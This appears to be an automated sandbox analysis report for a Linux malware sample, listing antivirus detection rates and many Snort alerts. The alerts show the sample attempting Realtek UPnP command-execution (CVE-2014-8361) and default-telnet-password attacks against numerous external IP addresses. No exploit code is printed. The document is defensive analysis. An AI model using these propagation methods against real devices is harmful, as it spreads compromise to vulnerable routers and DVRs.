Linux Analysis Report KHSQ48GkGn

AV Detection:

Multi AV Scanner detection for submitted file

Source: KHSQ48GkGn	Virustotal: Detection: 62%			Perma Link
Source: KHSQ48GkGn	ReversingLabs: Detection: 63%

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45302 -> 45.33.240.241:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45302 -> 45.33.240.241:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36880 -> 185.71.66.16:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36880 -> 185.71.66.16:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36826 -> 45.45.156.145:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36826 -> 45.45.156.145:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36884 -> 185.71.66.16:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36830 -> 45.45.156.145:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 87.139.152.191:23 -> 192.168.2.23:47072
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:47072 -> 87.139.152.191:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 87.139.152.191:23 -> 192.168.2.23:47072
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 87.139.152.191:23 -> 192.168.2.23:47072
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48406 -> 45.127.162.107:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48406 -> 45.127.162.107:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40722 -> 45.43.226.122:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40722 -> 45.43.226.122:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 87.139.152.191:23 -> 192.168.2.23:47168
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56652 -> 45.195.8.90:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56652 -> 45.195.8.90:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56678 -> 45.195.8.90:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 87.139.152.191:23 -> 192.168.2.23:47168
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 87.139.152.191:23 -> 192.168.2.23:47168
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35802 -> 45.207.219.157:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35802 -> 45.207.219.157:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 103.163.14.189:23 -> 192.168.2.23:33332
Source: Traffic	Snort IDS: 716 INFO TELNET access 87.139.152.191:23 -> 192.168.2.23:47250
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49010 -> 91.185.211.67:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49010 -> 91.185.211.67:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49012 -> 91.185.211.67:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 87.139.152.191:23 -> 192.168.2.23:47250
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 87.139.152.191:23 -> 192.168.2.23:47250
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40756 -> 45.33.254.99:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40756 -> 45.33.254.99:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43210 -> 45.125.110.26:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43210 -> 45.125.110.26:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53236 -> 45.195.13.156:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53236 -> 45.195.13.156:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36088 -> 45.126.230.172:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36088 -> 45.126.230.172:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 87.139.152.191:23 -> 192.168.2.23:47282
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59666 -> 45.254.26.176:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59666 -> 45.254.26.176:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 61.228.109.130:23 -> 192.168.2.23:39760
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 61.228.109.130:23 -> 192.168.2.23:39760
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37586 -> 185.147.59.97:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37586 -> 185.147.59.97:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37590 -> 185.147.59.97:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 87.139.152.191:23 -> 192.168.2.23:47282
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 87.139.152.191:23 -> 192.168.2.23:47282
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46498 -> 91.208.8.173:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46498 -> 91.208.8.173:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46500 -> 91.208.8.173:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44066 -> 45.120.108.140:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44066 -> 45.120.108.140:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58024 -> 45.126.76.207:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58024 -> 45.126.76.207:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44070 -> 45.120.108.140:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57752 -> 45.33.250.239:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57752 -> 45.33.250.239:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 87.139.152.191:23 -> 192.168.2.23:47322
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58022 -> 91.76.240.88:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58022 -> 91.76.240.88:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54360 -> 91.232.198.112:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54360 -> 91.232.198.112:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58028 -> 91.76.240.88:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54364 -> 91.232.198.112:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 87.139.152.191:23 -> 192.168.2.23:47322
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 87.139.152.191:23 -> 192.168.2.23:47322
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60496 -> 45.41.80.35:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60496 -> 45.41.80.35:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33212 -> 91.76.242.94:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33212 -> 91.76.242.94:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33216 -> 91.76.242.94:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53420 -> 91.76.222.172:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53420 -> 91.76.222.172:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53424 -> 91.76.222.172:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54844 -> 45.43.228.41:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54844 -> 45.43.228.41:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52918 -> 45.248.69.27:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52918 -> 45.248.69.27:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52928 -> 45.248.69.27:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 68.69.24.51:23 -> 192.168.2.23:60648
Source: Traffic	Snort IDS: 716 INFO TELNET access 103.163.14.189:23 -> 192.168.2.23:33510
Source: Traffic	Snort IDS: 716 INFO TELNET access 87.139.152.191:23 -> 192.168.2.23:47456
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35314 -> 45.42.90.10:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35314 -> 45.42.90.10:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44934 -> 185.131.76.190:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44934 -> 185.131.76.190:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44938 -> 185.131.76.190:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42650 -> 91.185.211.113:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42650 -> 91.185.211.113:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 87.139.152.191:23 -> 192.168.2.23:47456
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 87.139.152.191:23 -> 192.168.2.23:47456
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49750 -> 91.77.196.124:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49750 -> 91.77.196.124:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46228 -> 91.78.64.51:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46228 -> 91.78.64.51:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49754 -> 91.77.196.124:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46234 -> 91.78.64.51:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 68.69.24.51:23 -> 192.168.2.23:60808
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 36.77.52.80:23 -> 192.168.2.23:40516
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42296 -> 45.60.186.143:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42296 -> 45.60.186.143:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38252 -> 45.41.95.82:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38252 -> 45.41.95.82:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42300 -> 45.60.186.143:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 87.139.152.191:23 -> 192.168.2.23:47594
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:58252 -> 118.167.224.52:23
Source: Traffic	Snort IDS: 716 INFO TELNET access 68.69.24.51:23 -> 192.168.2.23:60884
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 87.139.152.191:23 -> 192.168.2.23:47594
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 87.139.152.191:23 -> 192.168.2.23:47594
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36066 -> 185.248.138.86:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36066 -> 185.248.138.86:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36068 -> 185.248.138.86:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52188 -> 91.200.122.74:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34192 -> 45.43.237.141:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34192 -> 45.43.237.141:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 87.139.152.191:23 -> 192.168.2.23:47632
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38710 -> 91.78.89.163:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38710 -> 91.78.89.163:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38714 -> 91.78.89.163:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 61.228.109.130:23 -> 192.168.2.23:40116
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 61.228.109.130:23 -> 192.168.2.23:40116
Source: Traffic	Snort IDS: 716 INFO TELNET access 68.69.24.51:23 -> 192.168.2.23:60922
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:60922 -> 68.69.24.51:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 87.139.152.191:23 -> 192.168.2.23:47632
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 87.139.152.191:23 -> 192.168.2.23:47632
Source: Traffic	Snort IDS: 716 INFO TELNET access 182.163.50.184:23 -> 192.168.2.23:40682
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42490 -> 45.33.243.135:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42490 -> 45.33.243.135:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34330 -> 45.41.81.233:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34330 -> 45.41.81.233:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53618 -> 45.113.2.225:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53618 -> 45.113.2.225:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47382 -> 185.131.76.111:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47382 -> 185.131.76.111:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47384 -> 185.131.76.111:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 186.236.57.72:23 -> 192.168.2.23:51544
Source: Traffic	Snort IDS: 716 INFO TELNET access 87.139.152.191:23 -> 192.168.2.23:47694
Source: Traffic	Snort IDS: 716 INFO TELNET access 103.163.14.189:23 -> 192.168.2.23:33790
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48110 -> 45.195.155.209:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48110 -> 45.195.155.209:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52230 -> 185.216.248.58:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52230 -> 185.216.248.58:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33576 -> 91.200.121.88:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52238 -> 185.216.248.58:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 68.69.24.51:23 -> 192.168.2.23:60990
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 103.158.94.100:23 -> 192.168.2.23:54554
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 103.158.94.100:23 -> 192.168.2.23:54554
Source: Traffic	Snort IDS: 716 INFO TELNET access 186.236.57.72:23 -> 192.168.2.23:51576
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 87.139.152.191:23 -> 192.168.2.23:47694
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 87.139.152.191:23 -> 192.168.2.23:47694
Source: Traffic	Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 185.29.219.69: -> 192.168.2.23:
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53970 -> 91.121.55.88:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53970 -> 91.121.55.88:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53976 -> 91.121.55.88:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54542 -> 45.126.247.9:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54542 -> 45.126.247.9:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58138 -> 45.115.236.133:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58138 -> 45.115.236.133:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54550 -> 45.126.247.9:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42806 -> 185.147.59.29:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42806 -> 185.147.59.29:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42810 -> 185.147.59.29:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33666 -> 45.115.240.160:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33666 -> 45.115.240.160:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 186.236.57.72:23 -> 192.168.2.23:51614
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46570 -> 45.121.83.166:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46570 -> 45.121.83.166:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 43.231.54.60:23 -> 192.168.2.23:37104
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 43.231.54.60:23 -> 192.168.2.23:37104
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 103.158.94.100:23 -> 192.168.2.23:54606
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 103.158.94.100:23 -> 192.168.2.23:54606
Source: Traffic	Snort IDS: 716 INFO TELNET access 87.139.152.191:23 -> 192.168.2.23:47782
Source: Traffic	Snort IDS: 716 INFO TELNET access 186.236.57.72:23 -> 192.168.2.23:51642
Source: Traffic	Snort IDS: 716 INFO TELNET access 68.69.24.51:23 -> 192.168.2.23:32834
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34466 -> 185.131.76.22:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34466 -> 185.131.76.22:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34468 -> 185.131.76.22:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 87.139.152.191:23 -> 192.168.2.23:47782
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 87.139.152.191:23 -> 192.168.2.23:47782
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38914 -> 45.195.8.204:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38914 -> 45.195.8.204:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53854 -> 185.216.249.118:52869
